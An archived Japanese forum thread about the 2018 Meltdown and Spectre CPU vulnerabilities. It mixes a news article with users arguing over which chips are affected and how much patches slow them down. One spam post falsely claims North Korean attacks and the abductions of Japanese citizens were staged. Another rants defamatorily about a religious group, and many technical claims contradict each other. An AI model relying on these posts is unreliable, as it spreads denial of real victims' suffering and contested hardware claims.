【エラッタ】Intel、ARMのCPUに欠陥 AMDは影響なしと発表
■ このスレッドは過去ログ倉庫に格納されています
Googleのセキュリティチーム「Project Zero」は、AMD、ARM、Intelを含む多数のCPUに影響する脆弱性「Meltdown」と「Spectre」について詳しい情報を公開し、その脆弱性には投機的実行の使用が関係しているとするうわさが事実であることを認めた。
AMDチップのユーザーにとって重要な情報もある。AMDは今週に入って同社のチップは影響を受けないとコメントしたが、Googleの見解はそれと異なる。
Googleはブログの記事で、「これらの脆弱性は、AMDやARM、Intelのものを含む多くのCPU、そして、それらを使用するデバイスやOSに影響する」と述べた。
AMDはその後、同社のプロセッサへの「リスクはほぼ皆無」と考えていると明言した。
この脆弱性は、Project Zeroの研究者であるJann Horn氏が2017年に発見していたという。これを悪用することで、攻撃者は本来ならアクセス不能であるはずのメモリを読み取ることができる。これにより、仮想マシン(VM)を攻撃して、ホストマシンのメモリを読み取り、そのマシン上でホストされているほかのVMのメモリを読み取ることが可能になる。
Googleによると、この攻撃には3つの手段があり、それぞれに対して個別にパッチを適用する必要があるという。
「これら3つの攻撃の変種は全て、通常のユーザー権限のプロセスがメモリデータを不正に読み取ることを可能にする。メモリデータには、パスワードや暗号化キーデータなどの機密情報が含まれることもある」(同社)
ブログの記事によると、この脆弱性は、CPUのパフォーマンスを最適化するための「投機的実行」というプロセスを悪用したものだという。
「Windows」「macOS」、Linux向けに、既にこれらの脆弱性のパッチが開発されている。Googleも自社システムへのパッチ提供を急いでいる。
「Android」向けの対策は米国時間1月5日のパッチに含まれている。またLinuxの修正のため、今後もアップデートがリリースされる予定だ。しかし、多くのAndroidベンダーが自社のデバイス向けのセキュリティアップデートの提供をしない、またはなかなかそれを実行しないことを考えると、Androidユーザーの多くは、新しいスマートフォンを購入するまで、無防備な状態のまま放置される可能性が高い。
ただし、Googleは「Androidプラットフォームについては、多くのAndroidデバイスで、この脆弱性を悪用するのは困難で、影響も限定的であることが確認されている」と述べている。
Amazonによると、EC2サービス上の「数%を除く全て」のインスタンスは既に保護されており、それ以外のインスタンスも数時間以内に保護される見通しだという。
提供:Getty Images/iStockphoto
この記事は海外CBS Interactive発の記事を朝日インタラクティブが日本向けに編集したものです。
https://japan.cnet.com/article/35112721/ くっだらね
東アジアカップでわかる北朝鮮情勢のインチキ
東アジアカップは男子は韓国、女子は北朝鮮の優勝で終わったけど、この大会に北朝鮮が参加するなんてあり得ないんだぞ
韓国は北朝鮮と対戦したけど、過去の北朝鮮ニュースが事実ならこの対戦は絶対にあり得ない
韓国は北朝鮮に数十年前から国民を数百人殺され誘拐されてる
さらに韓国内では暗殺や軍司情報目的の北のスパイ事件も起きている
滄浪号ハイジャック事件
青瓦台襲撃未遂事件
李承福事件(死者4)
大韓航空機YS-11ハイジャック事件
文世光事件(死者1)
ラングーン事件(死者21)
大韓航空機爆破(死者269)
韓国人拉致(400人以上)
以下ここ十年の事件
日本でも騒がれた2007年の美人スパイ事件など数々のスパイ事件
哨戒艇沈没(死者46)
延坪島砲撃(死者4)
韓国が本当にこれだけ国民を殺され誘拐、工作活動されてたらとっくに北に武力攻撃しているはずだが、未だに全くそれをしようとしていない
韓国は国民や国の要人を殺されてるのになんの反撃もしていない
それどころかそんな国と呑気にサッカーの試合をしてる
話がおかしいことがわかった?
韓国だけじゃない
日本も拉致事件が未だ未解決のうえに、度々日本上空を弾道ミサイルを飛ばされてる
日本のマスコミは北の核実験、ミサイル発射をどれだけ非難してきた?なのにそんな国相手に呑気にサッカーの試合してる
完全な犯罪国家を招待してサッカーなんかしてる
しかも女子はその北朝鮮が優勝って
話が馬鹿げてることがわかったろ
下のサイトを読んで、北が起こしたとされる数々の事件の起きたタイミングを知れば北を陥れたい者たちによる見え見えのヤラセ事件であることが簡単にわかるぞ
そしてそれを報道している日本のマスコミもグル なぜなら警察と一緒になって拉致事件を捏造したから
↓
URLがNGワードにされたから
「世界の脅威の真実」で検索 サイトのトップページやサイドバーにある「北朝鮮の真実」や「拉致事件の真実」とか読んでみ
あと「ロシアの真実」も分かりやすいヤラセ事件だから 「うちは大丈夫だからパッチは配布しない」
いいのかな いまだにAPU llano(2011年)な俺の大勝利!
なわけねぇ・・・('A`) 世界中のPCとOS新調させる気かよ!!
ふざくんなマジで!! いま、Sandybridgeをメインに使っているのだが、
これが使えなくなると、
P-!!!S 1.4G + i815マシンしか持ってない・・・。 どっちの言ってることが正しいんだ?
Intelが「CPUに深刻な欠陥」報道にに反論 「問題があるのはIntelだけではない」 AMDの公式
An Update on AMD Processor Security
https://www.amd.com/en/corporate/speculative-execution
https://i.imgur.com/mH0D8uh.jpg
1つ目はOSアプデにより解決、またそれによるパフォーマンスの影響も微々
2つ目は設計の違いによりほぼゼロリスク、また再現もされてない
3つ目は設計の違いによりゼロリスク
私達は設計の違いにより、 今のとこほぼゼロリスクだと信じています エロブラゲやるにも8GBとはいえメモリ不足出るんでいい加減新調したかったけど
もう少し様子見たほうがいいようだ えーと、ウェブブラウザで暗号化通信しててもパソコンのメモリを直接読み取られたら
無意味ってことかな? 1位が驚きの結果に…「美人度が高い国ランキング」トップ10
http://kbxhuop.xyz/
AMDのワシ勝利の微笑みwwwwwwwwwwwwwwww ずっと出来ない子扱いされてたうちのブルドーザーちゃんが見直される日が来るとは感無量です >>15
intelがAMDと言っていない以上他のメーカーとしか ARMとかPOWERとかSPARCとかRISC-Vとかはどうなん? >>29
x86のエミュやってるARMはダメみたいだな
他はセーフか? なんだ、俺無関係かよ
高かろう悪かろうザマー
やはり本物を見る目を持たないとな >>15
両立するだろ?
何にせよIntelは駄目だって事だ。
今ならRYZENがあるから移るならそこかな。
どうせなら新しいAPU出てから見つかって欲しかったな。そうすればシェアかなり奪えただろうに これでamdとIntelのベンチマークスコアが逆転したら面白くなるのにw >>38
この手の脆弱性はwin10では強制アプデかかる 個人PCがメモリ攻撃されて情報盗まれるってまず可能性は宝くじレベルだろ。
それよりエロサイトや怪しいメール開いて普通にウイルス食らうのが何万倍確率高いわ。 >>37
>>39
パッチ当たるとRAIZENもスコア激下がり
そしてMSのアプデはCPUの区別なくかかると思われ >>44
>そしてMSのアプデはCPUの区別なくかかると思われ
つまり、linux最強って事か エラった?
インテルはヘイトスピーチをやめるニダ。 core2の頃にもエラッタで騒いでたような覚えがあるから10年ぶりくらいか
あの頃からAMD使ってて良かったわ
性能ではぼろ負けし続けてRYZENでようやくどっこいになったけどさ >>46
K6-V〜athlonMP〜OpteronときてFX使いなんですがねぇ
IntelCPUは486SXとWintab7に乗ったやつしか使ったことないや >>44
windowsはAMDとintel別々に認識して違うドライバー
下手に一律なんてすればOSシェア落とすから固有になる可能性が高いよ |:::::::::.....
| In:::::::::: コンナトコロニ ユーザーガ!
|熱)ヽ,::: プレスコ スルナライマノウチ
|'ヽ)/:::::
|人ヽ:::::::|
i |:::::::::
|_|_|::::::::
|_i/:::::::::
In
( 熱)ヽ')
丶///⌒i プレ〜スコ〜
/._/)ノ /_/ プレ〜スコ〜
(/ / /(/
//∴
.。∵(/ ∵+
,/)∴+
In/ ∵。
(熱 )
( i' ⌒ヽ、 アツイヒトトキ
( ̄ヽ_ ゝヽ⊃ プレ〜スコ〜
\_ゝ/
i_)ゝ∵。 ∴
ヽ) ∵+
__
/yIn fi
\(熱 )ー-/ ^^i プレスコガ
| i' / ̄` -'' [ダイ温度520℃]ヲ オシラセシマス!
(/\ゝ
/ /\\
|_.ゝ .ヽ_ゞ
/_) ヽ) >>1
攻撃してなんになる?
時間の無駄
相手がわからんのやし これいざ実害出始めてから本格的に大騒ぎするんだろうなぁ
殆どの人対策取りようがないだろ >>57
linuxはもうカーネルを作り直すだけでいいんだけど >>55
もっと極端に言えば、
仮想通貨増やし放題w VT-xをBIOSで完全に無効にできて、攻撃できない状態になるなら、
BIOSを弄って貰う方がいいな。 >>11
うちのメイン機もllanoやでー
仕事、金融証券、通販専用機だけどなー。
ケーム機はRyzen 1700や intelCPUがこれを禁止したら、
速度的に、AMDに約3割のアドバンテージか。
AMDぼろ勝ちじゃん。
まあ、はやくパッチ当ててくれ。
パソコン使えん。 >>62
マイクロコードのアップデートでは対処出来ないって言ってたので
BIOSのアップデートでは治らないってことです >>68
AMD株が急伸、一時8.4%高−インテルの製品に欠陥との報道で
https://www.bloomberg.co.jp/news/articles/2018-01-03/P1ZNYC6S972C01
> AMDの株価は一時8.4%上昇し11.90ドルを付けた。
> インテルは一時4.5%下げて44.76ドル。インテルの広報担当はコメントを控えた。 140 :名無しさん@1周年 [] :2018/01/04(木) 12:19:18.99 ID:hiTU57Dm0.net
https://twitter.com/twitter/statuses/948706387491786752
Intelの Meltdown脆弱性
おわかりいただけるだろうか >>44
そんなことしたら、将来の修正版CPUも遅くなる。
CPUを判定して処理分岐するだろ。JK >>44
AMDのCPUは脆弱性の影響は極めて軽微で性能に影響は無いと発表してる。 >>71
すげー。おわった。すべておわった。あひゃひゃ。 そもそも情報を隠すからこういうことが起きるんだよね
筒抜けでいいじゃん win10パッチはもう出た skylake以降は性能影響は誤差レベル
はい解散解散(´・ω・`) あ、sandyおぢさんはいい加減これを機に買い換えてね☆ >>11
うちはLlanoとTrinity
Trinity の名前のAPUが欲しくて待ってたけど、待てずにLlano買った。 linuxはパッチでAMDCPUも激下がりでAMDが対策要求してる
ドライバじゃなくOSの問題だからCPU見て当てるかどうかの判別はなされないと思われ
AMDユーザーの対策は当該パッチが当たらないよう監視するしかない >>11
俺は正月にllanoからi3機に乗り換えたらこのザマや 鬼畜、東京都北区赤羽住民、創価学会集団ストーカーに加担する
ド ト ー ル コ ー ヒ ー は 創価学会だ (2015年時点)
ド ト ー ル グループ エ ク セ ル シ オ ー ル カ フ ェ 、星 乃 珈琲
赤羽警察署は偽証申告した住民の犯罪を
もみ消しにかかってる
っっっっっっっっっキックいい インテル終わってる。
インテル狂ってる。
インテル息してる? >>41
そのウィルスに同じ攻撃するコードが仕込まれていたら? CPUの脆弱性、影響を受けるCPUリスト公開。Intelの狡猾さが明らかに
http://blog.livedoor.jp/nichepcgamer/archives/1069497645.html
Intel CPUだけがずば抜けて影響を受けていることが分かります。
Intelがぶっちぎりにも関わらず作為的に他社と同列に語っているように見えます。 x64 3800+な俺は魚竿してる下界を高見の見物
使っててよかったアスロンちゃん >>97
なんだこのクソアフィサイト
便所におまえのゴミサイト貼るなや パプア君の出番ですよー!
あっ エラッタ エラッタ
って心境 >>17
この場合のbelieveは「理解している=確証を得た」と訳すのが正しいと思う 約2年前にCPUがAMDのNECのノートパソコンがお亡くなりになったもれ涙目(´;ω;`) 頭悪いから全然わからん。少ししたらバカにもわかる様に穴を塞ぐ方法がでてくるんか?
それとももうどうにもならんからAMDに逃げろなんか? あんまり煽るとIntelが対策放り投げてAMD独特のセキュリティホール発掘に全力注ぎだすぞ ライゼンは完全に新規設計だから不具合無し?
まあAMDの事だからもっとヤバい不具合が発見されそう。 >>103
だから穴を塞ぐ方法はあるけど速度が低下するんだろ グーグルのスマートスピーカと同じく仕込んだブラックボックスがバレただけ。 コレがギャグなら穴を塞いだパッチに穴が空いてる迄がワンセット
後は天丼 本来アクセスできないメモリ領域のデータを読み出せる可能性がある脆弱性が見つかる、多くのCPUに影響
https://security.srad.jp/story/18/01/04/1044221/
Project Zeroの発表では、3種類の脆弱性が提示されている。これに対しAMDは声明を発表、
AMDのCPUにおいてこれらのうち1つは影響があるもののソフトウェアやOSの修正で対応できるとし、
その場合の性能への影響もほとんどないとしている。また、1つは未検証ながらリスクは0に近く、1つは影響しないとしている。
これAMDの勝利宣言 まるで2000年問題みたいな。
「年号なんて2桁で十分。」
「メモリー上に展開しているファイルにプロテクトなんて。」 >>111
>AMDのCPUにおいてこれらのうち1つは影響があるもののソフトウェアやOSの修正で対応できるとし、
CPUに致命的欠陥があるんでソフトウェアで対応してくださいね(はあと)
いわゆる勝利宣言って奴やね >>14
鱈鯖なつかしす。
でも同じ欠陥は内包してるらしいが。
デュアルコアでもHTもないから事実上の影響はないらしいが >>14
鱈鯖も結局は同じだから、MMXPentiumまで遡らないとダメだな ARM版のNT4.0は大丈夫じゃないのか?困るなw >>108
それは理解してるけど今の所情弱層まで情報行き渡ってなさげだから、少ししたら周知されやすい情報が大々的に出てくるのかなって VM使うなってか?w
だいたいVMなんてアプリケーションのプロセスみたいなもんだし
アプリケーションのパフォーマンスの最適配置ができないやつらに
ハードウェアへのVMの最適配置なんかできるわけないしなw Windows7だが重要なアップデートの通知が今朝きた
これ入れたら30%遅くなるのかな
どうせもう少ししたらWindows7のサポート打ち切られるしこのまま使い続けるかな もうインテルはダメだな
奢れるものは久しからずって奴か MSのWindows10の最新のパッチをLenovoのTHINKPAD X100Eに当てると、
再起動後にブートしなくなる(途中でブートが止まる)。
起動時にエンターキーを叩いて、F11を選択することで、
構成をロールバックして、適用したパッチを元に戻して再起動してやると、
正常に立ち上がるが、その当て損ねたパッチをWindowsUpdateが再び
適用しようとして再起動を促してくる。つまり無限ループの地獄だ。
これは古い製品を棄てろという無言の圧力なのじゃないか? >>125
バスター使ってる?
特定アンチウィルスでパッチ失敗するみたいだよ
この特定ってやつが前にもやらかしたバスターではないかと X100EにはセキュリティソフトはMSのもの以外は入れていないよ。 VMなんか使わねーよ
一部のオタクのせいで巻き込むのはやめてくれ >>120
その頃にはスペクターとメルトダウン問題がごっちゃになってインテルの思惑通り有耶無耶になってるだろうな >>48
Haswellで鳴り物入りで追加したTXS-NI機能、大物エラッタ含みで、結局機能封鎖するマイクロコードの配布で塞いで
次世代に持ち越しになったろ >>127
新しいパッチが適応されたISOが出るの待って再インスコが一番すっきりしていいかもね それがな、X100Eは、最初買った時のWindows7のRADEON3xxx用の
ビデオドライバ(そのアップデートとしての2015年版)を入れないと、
ファンクションキーで外部のVGA(DSUB)につないだ液晶プロジェクター
などに正常に表示が出来ない問題があったりするんだよ。だから、最近の
Windows10のアップデートの後で、そのような問題が生じるようになってからは、
毎回アップデートの後に、デバイスマネージャーを使って、ビデオドライバー
だけを2015年のバージョンに戻す設定をして使って凌いでいる。
出張用のプレゼンテーションマシンとして買ったので、プロジェクタに
絵が出ないとなると致命的で持っている意味が無くなる。
だから、Windows10だけのクリーンインストールは(2015年のRADEON
3xxxのこのノートPCに対応したデバイスドライバが入っていないであろうと
思うので)恐ろしいのでやっていない。きっとAMDがこのノートPC用に
なんらかのカスタマイズを入れたチップがノートPCの製品に使われているのだ
ろうと思う。 投棄処理が問題なんだよな
いままでインテルは早いと言われてたけど
そういう罠があったんだね >>134
インテル固有の問題はリングプロテクションが無視して速度稼いでたってことかと
ヒでコード使ってみんな遊び始めてる
一方投機実行の方は再現かなり難しいみたいやぞ あー、やっと問題が何か分かったー
実際に出来るかどうかは知らなかったなー
でも、どうせNSA他は知ってたんだろ?
情報収集屋にも情報ドロボーと情報乞食の二種類いるが、
機密という名のほっかむりをしてる種類はどうせ知ってたんだろ? >>118
MMXPentiumは大丈夫なのか
一台あるんだよな 1995年以後ってことはPentium Pro以後ってことか。
16bit環境が遅くなって32bit環境に最適化されたとかなんとかだったから、
そこでリング機構イジってバグ入れてしまってそのままなんかな。 1994年当時 既にセガが64ビット級CPUを採用していた事実 日程朝刊から 【表】CPU脆弱性に対する各社の対応
マイクロソフト
ウィンドウズOSの更新を3日に実施し、クラウドサービスへの対策も展開中と説明
グーグル
アンドロイドOSの更新やクラウドサービスでの対策を実施。ブログで各製品・サービスに関して利用者が取るべき行動を明記
インテル
CPUを動かすファームウエアの更新を数日内に実施
アーム
半導体メーカーに対し、必要な場合にソフトウエアの対策を促している。IoT向けの省電力CPUには影響がないことも説明 ttp://d.hatena.ne.jp/Kango/20180104/1515094046
Meltdown攻撃は、今のところIntelだけが攻撃成立が確認されているが、AMDやARMではまだ検証が完全に済んでいないだけ。理論上はAMD、ARMでも成立する
AMD自身は「問題ないと信じている」という発表しかできていない
ARMも置かれている状況は同様
Spectre攻撃はAMDでもARMでも効くので、AMD、ARM搭載端末も修正が必要
ARMスマホ、タブレットでも成立するとGoogleがすでに発表している
根本的対処はSpectreのほうが難しく、Spectreの対処にも根本的には物理的CPUの交換が必要
Appleの発表には「Spectre緩和策は今後も開発とリリースを続ける」とあり、Spectre攻撃の根の深さが伺える
WindowsやLinuxでも同様の流れになっていく可能性が高い >>142
違う
meltdownが成立するのは「特権レベルのスカ抜けが起こる」プロセッサのみ
つまりintelの該当プロセッサのみだ
そもそもコレはISA仕様上抜けないようになってなければならない
AMDもARMも仕様通りに実装してあるから此れには無関係 >>143
それも話の次元が違う
AMDやARMの主張が正しいのかどうかや、仮に正しいとして本当に100%Meltdown脆弱性に対処しきれているのか、はそちらの主張とはまた別の次元の話
ここがまさにいま検証されていて、AMDがARMがガクブルしているところ
たとえばIntelでは1000時間でMeltdown攻撃が成立しうるから対処した、というときに
AMDで対処しなかった場合
もしAMDにも何かしらのあなたがあった、100%カバレージになってなかったという場合、10000時間書けた結果AMDのほうでは攻撃が成立したなんて話にもなりかねない >>138
PAEのアドレス変換テーブルが絡んでるのか? >>144
その低次元な話に合わせたとしたも
Ryzenはラボレベルでは出ないの検証済みだし
世界中でみんな穴探してる今、出てこない時点で
もし仮に時間で突破できるものとしてもクラッカーに狙われるリスクは現状0と見ていい
あとarmはa75がメルトダウン該当する >>146
国家レベルでのクラックが横行してる現在ではその論調は成立しない
100万人のクラッカーが狙って一人が大穴見つけた場合に、このクラッカーは当然その穴を公表しない
NSAでもFBIでもロシアでもイスラエルでもいいがどっかにその情報を売って大儲けする
そしてそういう大規模組織が使っていた穴が、あとになって一般に知られて大問題になる
それがワナクライとかで現実に起きていたこと
セキュリティ語るなら当然このくらいのことは理解してると思ってたんだけどねぇ、、、 >>147
2行目の事実がなければお前の主張は通るが現状それだけだとふーんあっそレベル
絶対安全がないのは百も承知
そこだけ見て騒ぐのは馬鹿丸出し >>148
涙目ちゃぶ台がえしで個人攻撃に走ったおバカさん乙
セキュリティの基本もわかってないやつが必死に間違った知識でIntel叩いてるのはほんと怖いな >>149
別に叩いてはないけどな
ARMが該当するの知らないみたいだし、おまいは何と戦ってるの? マルチポストしてボロボロに反論されて一番人少ないここで頑張ってる努力は認めてあげるよ? >>151
個人レベルだとOSやアプリは最新にしとけ、くらいしか影響がない
性能低下もほぼない >>151
パッチ当て
性能低下が気に食わないなら乗り換え
もしくはネットワークから切り離す
これだけ
いつの時代もエンドユーザの対処は変わらん なんか話が広がったな、、
バリアント3aでARMもmeltdown影響ありになったってことか
ttp://monoist.atmarkit.co.jp/mn/spv/1801/05/news062.html
アームは、バリアント1とバリアント2については「Cortex-R7」「Cortex-R8」「Cortex-A8」「Cortex-A9」「Cortex-A15」「Cortex-A17」「Cortex-A57」「Cortex-A72」「Cortex-A73」「Cortex-A75」が対象になると報告している。
また、バリアント3でも「Cortex-A75」が対象になるという。これらの他、アームが確認したバリアント3の亜種「バリアント3a」が存在し、これについては「Cortex-A15」「Cortex-A57」「Cortex-A72」が対象になるとしている 一番最初こそPentium3だったが、その後はAthlonXP→A10-5700とAMDを乗り継いできた俺の選択は正しかったか・・・・・・ プロセッサーの脆弱性を認識後、CEOが27億円相当の自社株を売却
https://www.businessinsider.jp/post-159438
インテルCEOブライアン・クルザニッチ(Brian Krzanich)氏は2017年11月、
2400万ドル(約27億円)相当の同社株式を売却していた。
売却はインテルがグーグルから同社チップの脆弱性を知らされた後に行われた。
脆弱性は今週、公になった。
インテルは、株式売却は脆弱性の問題とは無関係、予定された売却プランの
一環として行われたと述べた。だがクルザニッチ氏が売却プランを整備したのは
2017年10月。これはインテルが脆弱性を認識した数カ月後のことになる。
これがゴミンテルのカス社長のやり方
このまま首吊れよこのカス AMDなら安全、安心!
Variant1:Intel製の幅広いCPU,Arm製のCPU IPコア,AMD製のCPU
Variant2:Intel製の幅広いCPU,Arm製のCPU IPコア
Variant3:Intel製の幅広いCPU,Arm製のCortex-A75
※AMD製CPUは,原理的にはVariant2の影響を受ける可能性があるものの,Googleのセキュリティチームによると,現時点ではVariant2を使った攻撃が成功していないとのことだ。
それもあり,AMDは自社製CPUに関して「Variant2のリスクはゼロに近い」とアナウンスしている。また,AMD製CPUはVariant3の影響を受けない。
http://www.4gamer.net/games/999/G999902/20180105085/ >>160
まだ攻撃が成功してないだけで実質ダメだろうね、これから脆弱性該当になるだろう
なにせa15とa57がダメなんだから、中間がだいじょうぶになるわけがない >>161
bigLITTLE設計
A53はあくまで省電力のLittleコアだから系統が違う
A57とA15のBigコア系統になる
A57はA15から正当進化した性能重視のBigコア Intelも過去にAtomの一部でインオーダ実行のCPU作ってたね
そっちもセーフらしい MMXPentium機に久しぶりに火入れようかな
ネットにつながなければいいし一太郎もまだ
動くだろう 1/5のパッチで遅くなってないか?corei5-7400だけど、なんか起動時の挙動が違うんだけど… って、よく考えたら今のcore機もネットに繋がなければいいってことだな(;´Д`) >>161
A9とA53はそもそもセーフって発表されてるし A53はそもそも今回の騒動の原因である
投機的実行の機構がない >>167
遅くなってるね
Windows7-64bitでFirefoxで新しいタブを開くときに時間がかかるようになった >>142
その「meltdown攻撃が成立した」というソースって何に基づいている? 俺が知りうる限りだと、
meltdown攻撃に関しては、初期の報道に誤解があった御陰で錯綜しているように見えるんだよね。
特に「meltdown攻撃によるカーネルメモリへのサイドチャネル攻撃」っていう事象はデマを信じ込んでしまったエコーが多いように見える。
技術者がデマを無用に拡散している気配を感じるのよ。 最初に見たソースがGiやI*aなんかを使っているならば、
少し本当に自分が信じている内容に間違いがないのか?を疑った方がいいと思う。 >>147
それは 最先端の科学技術でもいえる事
犯罪をわからないように犯すために 最先端の科学技術を研究・開発をしている組織が存在する
そしてそのことがバレたとわかると こんなことができるようになりましたと言って商用化する
これも 実績だ http://www.4gamer.net/games/999/G999902/20180105085/
https://i.imgur.com/IDd6rR9.jpg
※AMD製CPUは,原理的にはVariant2(スペクター)の影響を受ける可能性が
あるものの,Googleのセキュリティチームによると,現時点ではVariant2を
使った攻撃が成功していないとのことだ。
それもあり,AMDは自社製CPUに関して「Variant2のリスクはゼロに近い」
とアナウンスしている。
また,AMD製CPUはVariant3(メルトダウン)の影響を受けない。
googleがやっても無理なら問題ない
Linux開発者もAMDは大丈夫言ってる
という段階 気にしなきゃいけないのは鯖屋で、
一般ユーザーのPCや端末には殆ど関係無いよ
ぶっちゃけ、やろうと思えば
こんな手の込んだ事しなくても盗み放題だし マイクロソフトの鯖乗っ取れば情報は無尽蔵にあるわな
世界中の情報をWinから自動で集まってくるのだから
鯖のある場所が国防省かもしれないが どうせくだらないサイトみてウィルス感染するほうがリスクたけぇんだから気にすんな。
仮想PCとか使ってねぇだろw AMDからAPUってのを出すようになってからAMDだけを選ぶようになった
何事も審美眼が大切だな >>123
それはspectreパッチで速度低下は気にしなくていいレベル Appleのホームページに、iOSでもMeltdownの影響があったのでiOS11.2で対応したという明確な記載が来てるな
次世代ARMコアのA75もMeltdownの影響ありと確定してるしこりゃAppleがARMやめてく流れになるかもな
ttps://support.apple.com/en-us/HT208394
> Meltdown is a name given to an exploitation technique
> known as CVE-2017-5754 or "rogue data cache load."
> The Meltdown technique can enable a user process to read kernel memory.
> Our analysis suggests that it has the most potential to be exploited.
> Apple released mitigations for Meltdown
> in iOS 11.2, macOS 10.13.2, and tvOS 11.2. インテル、25年続いた半導体首位陥落
https://www.nikkan.co.jp/articles/view/00456741
【シリコンバレー時事】2017年の半導体市場の世界シェアで、
前年2位だった韓国サムスン電子が米インテルを抜き首位に立ったことが4日、
米調査会社ガートナーによる売り上げの推計で明らかになった。
トップの交代は25年ぶり。 でもこれはハッカーも同じ脆弱性を抱えるわけで自分も別のハッカーに狙われる危険がある
そうなると核抑止力みたいなもんで各自にらみ合いするだけで大した被害は起きないんじゃないのかという楽観論 >>193
サムスンも今年後半から来年に春は終わるだろうな
反日反日で中国と蜜月してまんまとのせられて
馬鹿みたいに中国に工場作って全部技術流出するってちょっとアホ通り越してる
なんでも中国韓国で商談後に乾杯するときに日本を潰せって言って乾杯するのが流行ってたらしいけど
技術とったら韓国はポイ捨てされてワロタ
自分たちの一番の金のなる木の半導体技術を自ら教えるって本当頭おかしいよな >>195
>自分たちの一番の金のなる木の半導体技術を自ら教えるって本当頭おかしいよな
日本の人のこと笑えない。 ただ単に皆さんが一般的に使う脆弱性なの?
其れともより深刻なエラッタなのどっちよw
広義の脆弱性なんて言い訳は要らんよ。 なんでエラッタって表記するかね
発音からすればエラータだろうに >>205
ならりんごは「アップル」では無く「アポ」か?
水は「ウォーター」では無く「ワー」か?w >>126
対応できてないアンチウィルスソフトの場合はレジストリの値が異なるからパッチ適用対象外。
Key="HKEY_LOCAL_MACHINE" Subkey="SOFTWARE\Microsoft\Windows\CurrentVersion\QualityCompat" Value="cadca5fe-87d3-4b96-b7fb-a231484277cc" Type="REG_DWORD” >>206
アホ乙
「アポ」や「ワー」じゃ全く通じない
むしろネイティブの音素列と普通に対応する表記をしろと言っているのだから
「ワー」ではなく「ウォーター」と表記しろと言っている側だ
Errataをエラッタと表現するのは、
ダースベイダーが「アイアムユアファッザー」っていうようなもの
工学分野ではバカが適当にカタカナ表記を決めて広めるから困る
というかちゃんとエラータと書いているサイトもあるのに、
そっちが間違えているように見えてしまうw
Dataは「データ」か「ダータ」だろ
「ダッタ」って書かれたら何のことやら 全員にひがいがあるわけではないし、一般人はデータ盗まれたところで大した被害でもないだろ ブラウザでメルトダウンを悪用したスクリプトを実行出来たとしても
ハッカーが欲しいデータをスキャンして送信させるまで相当時間が掛かるのでは
ファンがぶいーんって回りだして
それまでにブラウザが閉じられそう javaでこんな特殊なコード実行できないだろ
カバが空を飛ぶ可能性を排除できないっていってるだけだよ >>213
JavaScriptをJavaって略すな!! オイラのPehomeUが大勝利www
ユダヤのインテル入つてゐる阿呆ども、ざまあwwww
スマアホもユダヤのアップルを使つてゐさうだなwwww >>208
ネッスルは可笑しいよネスレだろ派かw
アサスは可笑しいよエイスースだよ派かw >>213
そんなに難しいスクリプトか?
キャッシュにある平文の情報をコピーして、特定のPCに送るだけのプログラムだぞ。
その情報の中にIDとパスワードの一部でもあれば、ハッキングできる可能性が高まる。 >>195
日本中の大手企業がやってきた道で
今でも現在進行形なんだが 今だイケイケ アマデのダンス
エラッタ ラッタ ラッタ ラッタ ラッタ エラッタな
これでインテル ヤッタ ヤッタ 終わる
アマデ 安心 ラッタ ラッタ エラッタは
https://www.youtube.com/watch?v=xoGE5xEVSME >>222
___ _|__ __ _/_ヽヽ _./_
|/ / | ./ / ヽ
/| / | /  ̄ ̄ / _|
( __ レ|' レ / ヽ__ (_ノヽ
 ̄ >>225
世界で業界No1企業がやる事は全て正義
反論する企業はアメリカに喧嘩を売っているのと同じ 国内のハイエンドのAndroidスマホで一番使われてるSnapdragon 835は
今回のメルトダウンの影響がないCortex-A73のカスタマイズ品
メルトダウンの影響があるCortex-A75のカスタマイズ品が使われてるのがSnapdragon 845で
Snapdragon 845はまだ出荷されてないはず >>1
_
_|.  ̄|
/ |___|
/ _.|___|_ < IceLake はまだかね?
|| ( ・∀・)
|| / <ヽ∞/>\
|| | <ヽ./>- |
__|| | o o |_ξ
\ \__(久)__/_ \
||i\ 、__ノフ \
||ヽ i\ _ __ ____ __ _.\
|| ゙ヽ i ハ i ハ i ハ i ハ |
|| ゙|i~〜^~^〜^~^〜^~^〜^i| >>189
AppleはARMからアーキテクチャライセンスを受けて独自にコアを設計してるから
Cortex-A75は全く関係ない
というかAppleのA11のCPUコアは今のところ、どのARMが設計したコアよりもずっと高性能
メルトダウンの影響は知らないけどな 悪の淫照帝国が滅び、聖AMD王国が世界制覇するんだな
オラなんだかワクワクしてきたぞ Intelの脆弱性をなんでGoogleが認めるんだよ 主にサーバ向けの用途も考慮した製品がメルトダウンの亜種に引っかかったようだな
Cortex-A15、A57、A72、A75とすべてサーバ向けを考慮したもの
A75はもろにメルトダウンの影響を受けるしね
ミドルレンジ、ローエンドのスマホでは
投機的実行の機能のないCortex-A53やCortex-A7が使われてる
組み込みで多く出てるCortex-M3、M4、M7、M0、M0+も投機的実行をする機能が無いので
全く影響を受けない
ようするにARMで一番数が出てる分野では全く影響がない >>237
,. - ~ ` -、、
,,イ'´ 'kヽ、
// ヾミミ、 買収金額は、約3兆3000億円 ニダ〜!!!
〈イ r'-‐━、,ノi,━‐-~ ミ ヽ
|| _=・= ) '( '=・=' 〉_ }
'リ'~ )) (o、,o ),(( 〈 /kソ
| ( (〈トェェェェェイ〉)){ >/
| ) )'ヾェェェ/,( ( V
|( ( _∵_ ) )/
\ `ー― ~ 〈
〉 ト、
,,イ \ / ト、
/ | \_,/ | \
/ | / ヽ | \
https://www.nikkei.com/article/DGXMZO13162680R20C17A2000000/ 今回、メルトダウンの影響を全く受けないCortex-A73は
サーバ向けの用途を考慮してないモバイル特化のハイエンドコアなんだよな 日本で本格的に報道されるのは
対策済みのCPUが市場に出回って
買い替えできるようになってからだろう Raspberry Piに代表するような低価格のシングルボードコンピュータで使われてるARMは
主に投機的実行の機能のないCortex-A7やCortex-A53だから今回の件には全く関係がない >>237,>>242
法則発動キタ━━━━(゚∀゚)━━━━!! >>44
WindowsアップデートはCPUみてるよ。 今の孫さんは、兆の桁じゃなく100兆の桁目指しているから、たいした損失ではなさそう >>241
まったく逆
Intelの場合はWindowsやLinuxと協力してすでにほとんどの環境の対応ができるようになっている
それに対してARMでは莫大な数のスマホ、タブレットがMeltdownの影響を受けるまま野ざらしになっている
これに対してベンダーは脆弱性のある設計をしたARMに対して損害賠償をすることも考えられるし、
実際問題としてこれを放置して逃げるようではもはやそんなCPUアーキテクチャはまともなビジネスでは使えないと判断される
今回の件でARMは所詮はオモチャということが確定する
これはIntelやRISC-Vへのとてつもなく強い追い風になるのは間違いない >>252
